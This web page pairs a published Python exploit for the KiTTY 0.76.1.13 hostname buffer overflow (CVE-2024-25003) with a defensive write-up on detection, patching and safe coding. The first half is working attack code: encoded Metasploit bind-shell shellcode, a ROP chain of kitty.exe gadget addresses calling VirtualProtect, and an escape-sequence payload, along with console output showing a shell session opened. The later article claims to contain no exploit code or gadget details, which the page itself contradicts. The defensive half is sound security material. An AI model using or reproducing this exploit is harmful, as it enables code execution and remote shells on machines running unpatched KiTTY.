KiTTY 0.76.1.13 - 'Start Duplicated Session Hostname' Buffer Overflow

Exploit Author: DEFCESCO Analysis Author: www.bubbleslearn.ir Category: Local Language: Python Published Date: 2024-03-14

# Exploit Title: KiTTY 0.76.1.13 - 'Start Duplicated Session Hostname' Buffer Overflow
# Exploit Author: DEFCESCO (Austin A. DeFrancesco)
# Vendor Homepage: https://github.com/cyd01/KiTTY/=
# Software Link: https://github.com/cyd01/KiTTY/releases/download/v0.76.1.13/kitty-bin-0.76.1.13.zip
# Version: ≤ 0.76.1.13
# Tested on: Microsoft Windows 11/10/8/7/XP
# CVE: 2024-25003
#-------------------------------------------------------------------------------------#
# Blog: https://blog.DEFCESCO.io/Hell0+KiTTY
#-------------------------------------------------------------------------------------#
# msf6 payload(windows/shell_bind_tcp) > to_handler                                   #
# [*] Payload Handler Started as Job 1                                                #
# msf6 payload(windows/shell_bind_tcp) >                                              #
# [*] Started bind TCP handler against 192.168.100.28:4444                            #
# [*] Command shell session 1 opened (192.168.100.119:39315 -> 192.168.100.28:4444)   # 
#-------------------------------------------------------------------------------------#

import sys
import os
import struct

#---------------------------------------------------------------------------------------------#
# msf6 payload(windows/shell_bind_tcp) > generate -b '\x00\x07\x0a\x0d\x1b\x9c\x3A\x40' -f py #
# windows/shell_bind_tcp - 375 bytes                                                          #
# https://metasploit.com/                                                                     #
# Encoder: x86/xor_poly                                                                       #
# VERBOSE=false, LPORT=4444, RHOST=192.168.100.28,                                            #
# PrependMigrate=false, EXITFUNC=process, CreateSession=true,                                 #
# AutoVerifySession=true                                                                      #
#---------------------------------------------------------------------------------------------#

buf =  b""
buf += b"\x51\x53\x56\x57\xdb\xd9\xd9\x74\x24\xf4\x5f\x41"
buf += b"\x49\x31\xc9\x51\x59\x90\x90\x81\xe9\xae\xff\xff"
buf += b"\xff\xbe\xd4\xa1\xc4\xf4\x31\x77\x2b\x83\xef\xfc"
buf += b"\x51\x59\x90\xff\xc9\x75\xf3\x5f\x5e\x5b\x59\x28"
buf += b"\x49\x46\xf4\xd4\xa1\xa4\x7d\x31\x90\x04\x90\x5f"
buf += b"\xf1\xf4\x7f\x86\xad\x4f\xa6\xc0\x2a\xb6\xdc\xdb"
buf += b"\x16\x8e\xd2\xe5\x5e\x68\xc8\xb5\xdd\xc6\xd8\xf4"
buf += b"\x60\x0b\xf9\xd5\x66\x26\x06\x86\xf6\x4f\xa6\xc4"
buf += b"\x2a\x8e\xc8\x5f\xed\xd5\x8c\x37\xe9\xc5\x25\x85"
buf += b"\x2a\x9d\xd4\xd5\x72\x4f\xbd\xcc\x42\xfe\xbd\x5f"
buf += b"\x95\x4f\xf5\x02\x90\x3b\x58\x15\x6e\xc9\xf5\x13"
buf += b"\x99\x24\x81\x22\xa2\xb9\x0c\xef\xdc\xe0\x81\x30"
buf += b"\xf9\x4f\xac\xf0\xa0\x17\x92\x5f\xad\x8f\x7f\x8c"
buf += b"\xbd\xc5\x27\x5f\xa5\x4f\xf5\x04\x28\x80\xd0\xf0"
buf += b"\xfa\x9f\x95\x8d\xfb\x95\x0b\x34\xfe\x9b\xae\x5f"
buf += b"\xb3\x2f\x79\x89\xc9\xf7\xc6\xd4\xa1\xac\x83\xa7"
buf += b"\x93\x9b\xa0\xbc\xed\xb3\xd2\xd3\x5e\x11\x4c\x44"
buf += b"\xa0\xc4\xf4\xfd\x65\x90\xa4\xbc\x88\x44\x9f\xd4"
buf += b"\x5e\x11\x9e\xdc\xf8\x94\x16\x29\xe1\x94\xb4\x84"
buf += b"\xc9\x2e\xfb\x0b\x41\x3b\x21\x43\xc9\xc6\xf4\xc5"
buf += b"\xfd\x4d\x12\xbe\xb1\x92\xa3\xbc\x63\x1f\xc3\xb3"
buf += b"\x5e\x11\xa3\xbc\x16\x2d\xcc\x2b\x5e\x11\xa3\xbc"
buf += b"\xd5\x28\xcf\x35\x5e\x11\xa3\x43\xc9\xb1\x9a\x99"
buf += b"\xc0\x3b\x21\xbc\xc2\xa9\x90\xd4\x28\x27\xa3\x83"
buf += b"\xf6\xf5\x02\xbe\xb3\x9d\xa2\x36\x5c\xa2\x33\x90"
buf += b"\x85\xf8\xf5\xd5\x2c\x80\xd0\xc4\x67\xc4\xb0\x80"
buf += b"\xf1\x92\xa2\x82\xe7\x92\xba\x82\xf7\x97\xa2\xbc"
buf += b"\xd8\x08\xcb\x52\x5e\x11\x7d\x34\xef\x92\xb2\x2b"
buf += b"\x91\xac\xfc\x53\xbc\xa4\x0b\x01\x1a\x34\x41\x76"
buf += b"\xf7\xac\x52\x41\x1c\x59\x0b\x01\x9d\xc2\x88\xde"
buf += b"\x21\x3f\x14\xa1\xa4\x7f\xb3\xc7\xd3\xab\x9e\xd4"
buf += b"\xf2\x3b\x21"


def shellcode():
sc = b''
sc += b'\xBB\x44\x24\x44\x44' # mov    ebx,0x44442444
sc += b'\xB8\x44\x44\x44\x44' # mov    eax,0x44444444
sc += b'\x29\xD8'             # sub    eax,ebx
sc += b'\x29\xC4'             # sub    esp,eax
sc += buf
sc += b'\x90' * (1052-len(sc))
assert len(sc) == 1052 
return sc


def create_rop_chain():

# rop chain generated with mona.py - www.corelan.be
rop_gadgets = [
#[---INFO:gadgets_to_set_esi:---]
0x004c5832,  # POP EAX # ADD ESP,14 # POP EBX # POP ESI # RETN [kitty.exe]
0x006424a4,  # ptr to &VirtualProtect() [IAT kitty.exe]
0x41414141,  # Filler (compensate)
0x41414141,  # Filler (compensate)
0x41414141,  # Filler (compensate)
0x41414141,  # Filler (compensate)
0x41414141,  # Filler (compensate)
0x41414141,  # Filler (compensate)
0x41414141,  # Filler (compensate)
0x00484e07,  # MOV EAX,DWORD PTR DS:[EAX] # RETN [kitty.exe]
0x00473cf6,  # XCHG EAX,ESI # RETN [kitty.exe]
#[---INFO:gadgets_to_set_ebp:---]
0x00429953,  # POP EBP # RETN [kitty.exe]
0x005405b0, # push esp; ret 0 [kitty.exe]
#[---INFO:gadgets_to_set_ebx:---]
0x0049d9f9,  # POP EBX # RETN [kitty.exe]
0x00000201,  # 0x00000201-> ebx
#[---INFO:gadgets_to_set_edx:---]
0x00430dce,  # POP EDX # RETN [kitty.exe]
0x00000040,  # 0x00000040-> edx
#[---INFO:gadgets_to_set_ecx:---]
0x005ac58c,  # POP ECX # RETN [kitty.exe]
0x004d81d9,  # &Writable location [kitty.exe]
#[---INFO:gadgets_to_set_edi:---]
0x004fa404,  # POP EDI # RETN [kitty.exe]
0x005a2001,  # RETN (ROP NOP) [kitty.exe]
#[---INFO:gadgets_to_set_eax:---]
0x004cd011,  # POP EAX # POP EBX # RETN [kitty.exe]
0x90909090,  # nop
0x41414141,  # Filler (compensate)
#[---INFO:pushad:---]
0x005dfbac,  # PUSHAD # RETN [kitty.exe]
]
return b''.join(struct.pack('<I', _) for _ in rop_gadgets)

rop_chain = create_rop_chain()


#----------------------------------------------------------------------------------#
# Badchars: \x00\x07\x0a\x0d\x1b\x9c\x3A\x40                                       #
# Return Address Information: 0x0052033c : {pivot 332 / 0x14c} :                   #
#   ADD ESP,13C # POP EBX # POP ESI # POP EDI # POP EBP # RETN                     #
#   ** [kitty.exe] **   |  startnull,ascii {PAGE_EXECUTE_READWRITE}                #
# Shellcode size at ESP: 1052                                                      #
#----------------------------------------------------------------------------------#

return_address = struct.pack('<I',  0x0052033c) # ADD ESP,13C # POP EBX # POP ESI # POP EDI # POP EBP # RETN    ** [kitty.exe] **   |  startnull,ascii {PAGE_EXECUTE_READWRITE}

rop_chain_padding = b'\x90' * 35 
nops = b'\x90' * 88

escape_sequence = b'\033]0;__dt:' + shellcode() + return_address
escape_sequence += rop_chain_padding + rop_chain
escape_sequence += b'\x90'
escape_sequence += b"\xE9\x2A\xFA\xFF\xFF" #jmp $eip-1490
escape_sequence += nops + b'\007'

stdout = os.fdopen(sys.stdout.fileno(), 'wb') 
stdout.write(escape_sequence)
stdout.flush()

KiTTY 0.76.1.13 "Start Duplicated Session Hostname" Buffer Overflow (CVE-2024-25003) — Analysis and Defensive Guidance

Summary: CVE-2024-25003 is a stack-based buffer overflow in KiTTY (a PuTTY fork) affecting versions up to and including 0.76.1.13. The issue arises when processing the “Start Duplicated Session Hostname” or related escape/hostname input, allowing an attacker who can supply a crafted string to trigger memory corruption. Successful exploitation can enable arbitrary code execution or crash the application on affected Windows systems.

Who should care

System administrators who deploy KiTTY on workstations or servers.
Security engineers monitoring endpoint and remote-access tools.
Developers maintaining PuTTY derivatives or apps that parse terminal escape sequences and hostnames.

Affected versions and status

Affected: KiTTY versions ≤ 0.76.1.13 (per public advisories).
Patched: Users should consult the official KiTTY GitHub releases page and upgrade to the vendor-provided fixed version as soon as available.
CVE identifier: CVE-2024-25003.

High-level technical overview (safe, conceptual)

The vulnerability stems from improper bounds validation when KiTTY handles certain input used to populate a hostname field (such as when duplicating a session). If an input buffer is read into a fixed-size stack buffer without verifying length, a long input can overwrite adjacent stack data, including return addresses or structured exception handlers. An attacker who can deliver such an input to a victim running KiTTY could cause a crash or potentially execute arbitrary code.

Important: This description is conceptual to explain the risk; it intentionally avoids exploit-specific details (payloads, gadget chains, memory addresses) that would enable misuse.

Why this is dangerous

Remote code execution: When exploited in practice, memory corruption can be leveraged to redirect execution flow.
Wide deployment: KiTTY is used as a widely-distributed SSH/Telnet client; many endpoints may be exposed.
Bypass mitigations: Real-world exploit chains often combine buffer overflow with return-oriented programming (ROP) and custom shellcode; modern mitigations (ASLR, DEP, stack cookies) can be bypassed in some environments, increasing risk.

Detection and Indicators of Compromise (IoCs)

Because the exploit results in abnormal application behavior, detection focuses on both application-level anomalies and suspicious artifacts. Below are practical indicators and detection points:

Application crashes of kitty.exe or abnormal termination logs correlated with user activity.
Unexpected child processes spawned by KiTTY or network listeners initiated by a user session.
New or unusual outbound connections from hosts running KiTTY after session activity.
Binary tampering: modified KiTTY executable timestamps or checksums on endpoints that should be immutable.
Security telemetry showing long or unusual escape sequences or very long hostname fields used in session duplication.

Example YARA rule to help find unpatched binaries


rule Kitty_Version_0_76_1_13_like
{
    meta:
        description = "Heuristic to identify KiTTY binaries containing version string 0.76.1.13 (use responsibly)"
        author = "security-team"
        version = "1.0"
    strings:
        $v = "KiTTY 0.76.1.13" ascii nocase
        $s1 = "Start Duplicated Session Hostname" ascii nocase
    condition:
        any of them
}

Explanation: This YARA rule looks for human-readable strings commonly embedded in builds (version string, specific UI labels). It is helpful for inventory scanning to locate likely impacted files. It is not an exploit and does not attempt exploitation.

Mitigation and patching guidance

The safest and primary mitigation is to apply the vendor patch or upgrade to a non-vulnerable KiTTY release published by the project. Additional recommendations follow defensive-in-depth principles.

Patch immediately: Upgrade all KiTTY instances to the patched version. If immediate upgrade is impossible, restrict usage until remediation.
Limit attack surface: Restrict which users can open network sessions with untrusted endpoints. Apply firewall rules to block connections to and from unknown hosts.
Application control: Use endpoint allowlisting (AppLocker, OS policy) to prevent execution of unauthorized KiTTY builds.
Network monitoring: Monitor for unusual outbound connections and new listening ports originating from client endpoints running KiTTY.
Least privilege: Run KiTTY with minimal privileges where possible; avoid running as administrator.
Harden endpoints: Ensure DEP (Data Execution Prevention), ASLR, and stack canaries are enabled on systems, and keep OS patches current.

Safe testing and investigation advice

If you need to test or validate patching in your environment, do so in isolated, controlled laboratory systems. Never test exploit code on production systems or on systems you don't own/operate. Recommended steps:

Create isolated virtual machines with snapshots for fast rollback.
Use vendor-provided patched and unpatched binaries for version verification only — do not execute untrusted payloads.
Use static scanning (strings, checksum/hash) to compare files rather than dynamic execution when possible.

Secure coding practices to prevent similar vulnerabilities

The root cause is classic: insufficient input validation and unsafe use of fixed-size buffers. Below are concrete, widely-applicable mitigations and code patterns to avoid buffer overflows.

Use safe string APIs and explicit bounds checking (C example)


/* Safe hostname copy: use size-limited routines and validate length */#include 
#include 

int copy_hostname(char *dest, size_t dest_size, const char *src) {
    if (!dest || !src) return -1;
    size_t src_len = strnlen(src, dest_size);
    if (src_len >= dest_size) {
        /* source too long for buffer */        return -2;
    }
    memcpy(dest, src, src_len);
    dest[src_len] = '\0';
    return 0;
}

Explanation: This snippet measures the source length (bounded by dest_size) and enforces that it fits before copying. It avoids unsafe functions like gets or unchecked strcpy. Use platform-specific safer APIs (strncpy_s, strlcpy) where available.

Validate escape sequences and limit parsing state (pseudo-Python)


def process_terminal_sequence(seq):
    MAX_SEQ_LEN = 1024  # tuned per application needs
    if len(seq) == 0 or len(seq) > MAX_SEQ_LEN:
        raise ValueError("sequence length out of bounds")
    # whitelist expected sequences or use a strict parser
    # avoid directly copying into fixed-size buffers without bounds checks
    # further parse and handle only known sequences
    return parse_sequence(seq)

Explanation: Limit the maximum length you accept from untrusted inputs and prefer whitelisting known-good sequences. This reduces the risk that malformed or intentionally crafted long sequences trigger memory corruption.

Detection rules and monitoring recommendations

Create SIEM alerts for repeated crashes of kitty.exe, especially after session activity.
Alert on child processes launched by KiTTY that are unusual (e.g., listeners or reverse shells).
Use endpoint EDR to capture memory dumps of crashing kitty.exe for offline analysis, following privacy and legal policies.
Deploy periodic binary integrity checks against known-good hashes for KiTTY installations.

Incident response checklist

Isolate affected hosts from the network.
Collect volatile evidence (process lists, network connections) and persistent evidence (logs, binary hashes).
Examine telemetry for signs of post-exploitation activity (privilege escalation, lateral movement, persistence artifacts).
Restore from known-good backups or re-image affected systems.
Apply vendor patches and rotate credentials that may have been exposed.

Responsible disclosure and community coordination

If you discover an unpatched or related issue, follow responsible disclosure: report it privately to the KiTTY maintainers or through a coordinated vulnerability disclosure program. Share reproducible, sanitized diagnostic data rather than exploit code. Give vendors reasonable time to respond before publishing full technical details.

References and resources

KiTTY GitHub releases and project page — check for official patches and release notes.
CVE entry CVE-2024-25003 — for timeline and summary metadata.
Secure coding references (CERT secure coding standards, OWASP memory safety guidance).
Endpoint and network monitoring best practices (vendor documentation for EDR/SIEM).

Note: This article intentionally avoids providing exploit code, memory addresses, ROP gadget details, or step-by-step weaponization instructions. The goal is to inform defenders, administrators, and developers so they can mitigate risk and protect their environments.